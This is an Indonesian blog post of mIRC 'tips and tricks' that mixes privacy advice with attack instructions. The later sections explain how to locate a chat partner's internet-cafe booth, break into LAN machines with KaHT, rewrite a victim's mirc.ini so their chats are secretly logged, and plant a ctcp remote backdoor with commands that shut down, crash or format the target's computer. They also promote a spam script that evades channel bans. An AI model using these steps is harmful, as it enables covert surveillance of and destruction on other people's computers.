Tips dan triks IRC (Special)

Tips dan triks IRC ini sangat populer di kalangan chatter karena tips dan triks ini berisi cara melindungi identitas diri kita dari para chatter lainnya sekaligus juga dapat untuk mengetahui keberadaan teman chatting kita, memata-matai dia, melihat isi chattingan dia sampai meremote mIRC teman chatting kita tersebut.

Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ?
Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :

1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis

2. Periksa pada option Connect lalu pada identd, gantilah “user id” jika ada nomor room tertulis disini.

3. Periksa pada option IRC lalu pada Logging, gantilah menjadi “none” pada “automatically logs” jika posisi diluar itu.

4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang )

Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :

1. jika “user id” tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri

2. Jika pada logging bukan “none” maka bersiap-siaplah isi chattingan anda dilihat orang ketiga

3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Tips tambahan di IRC
Tips tambahan khusus para chatter yang ingin menyembunyikan diri

Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?

1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.

2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.

3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.

Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Tips tambahan di IRC II
Tips agar kita tidak diremote atau dipermainkan di IRC

Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :

WANNA BE OPERATOR #channel ?? copy/paste this-> < <== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek ) STOP SPAM copy/paste this-> <<== Ini juga sama saja

Cara menangani para cracker :

1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R.
2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing).
3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off
4. Menghilangkan decode :
Ketik kode ini di mIRC :

//!timers off | !ignore -r | !unload -rsn ” $+ $chr(160) $+ . $+ $chr(160) $+ ” | !remove ” $+ $chr(160) $+ . $+ $chr(160) $+ ” | !say $script($script(0))

Penulis :
Yogya Family Code

Referensi
rhega (OP #Yogyakarta)

Triks di IRC :
Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ?
masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect.

Bagaimana cara melacak keberadaan teman chat kita ?
Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, )

Bagaimana cara melacak boks warnet teman chat kita ?
Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda “@ip addreas”, jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda.

Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)?
D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini.

Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel)
/who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda).

Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ?
cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita.

Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di “c:\program files\mirc\logs”.

Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ?
Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di “c:\program files\mirc” lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini.

Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ?
Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada “connect” lalu “firewall’, firewall support diganti “server”, protocol diganti “proxy” lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.

Referensi untuk mendapatkan proxy :

- http://www.proxyweb.net
- http://proxy.lessel.us/cgi-bin/nph-proxy.cgi
- http://www.multiproxy.org
- http://www.publicproxyservers.com/index.html
- http://www.hotscripts.com/Detailed/28480.html
- http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
- http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html
- http://www.steganos.com (proxy)
- http://www.guardster.com (free proxy)
- http://www.anonymizer.com/index.cgi (proxy)
- http://www.orangatango.com/home/index.ie.html (proxy)
- http://proxify.com
- http://www.tehbox.com/proxy
- http://www.proxy4free.com/index.html
- http://www.stayinvisible.com/index.pl
- http://free-proxies.com

(Referensi Proxy dari Si Cebol, Indonewbies.tk)

Menampilkan ip-ip addreas para chatter di channel?

Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Special triks di IRC :
Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa !
(Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004)

Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut :

1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS)
2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat)

Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : “cd\progra~1\mirc”) tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : “cd\mirc”)

A. Untuk komputer yang drive D-nya di share :

Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini
jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini

[dirs]
logdir=d:\

[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0

setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya.

Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah :

[dirs]
logdir=d:\

Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah:
1. 5=1x
2. 100=1x
3. 0=7x
4. 1=1x
5. 0=1x
6. 1=7x
7. 0=2x
8. 1=3x
9. 0=1x
10. 5=1x
11. 0=5x
12. 1=1x
13. 0=2x

B. Untuk komputer sasaran tidak dishare :

Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : “cd\progra~1\mirc”) tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : “cd\mirc”)

Setelah kita masuk didirektory MiRC, ketik “del mirc ini” setelah itu ketik “copy con mirc.ini” lalu ketik kode rekam mirc.ini dibawah ini :

[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0

setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di “c:\progra~1\mirc\logs” cara melihat cukup ketik “type nickname.log*
* : Nickname diisi nick orang

Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, )

Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, “anda tidak melihat kami tapi kami melihat anda” :))

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Remote IRC (Mengontrol 100% segala chattingan user)

ketikkan perintah “ctcp *:*:?:$1-” ke dalam remote mIRC sasaran lalu masukan juga di dalam variables “%master Nick_kamu”.

Perintah mengontrol komputer target :

/ctcp run rundll user,#7 : Melakukan Shutdown komputer sasaran
/ctcp run rundll user,#3 : Membuat Crash / Hang komputer sasaran
/ctcp run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang
/ctcp run format /y : Melakukan format pada komputer sasaran
/ctcp run http://.com : Membuka situs sesuai keinginan kamu
/ctcp /nick : Mengganti nick mIRC sasaran
(Perintah lainnya dapat dilihat di Peritah DAl.NET)

Penulis :
Yogya Family Code

Referensi :
1. Jasakom.com

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Kedasyatan Hennes Script NW v0.61 IRC
Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61

Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ?

Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 – 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya.

Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini.

Bagaimana cara menjalankan fasilitas ini ?
Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe )

Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, http://www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri.

Penulis :
Yogya Family Code

About these ads

About this entry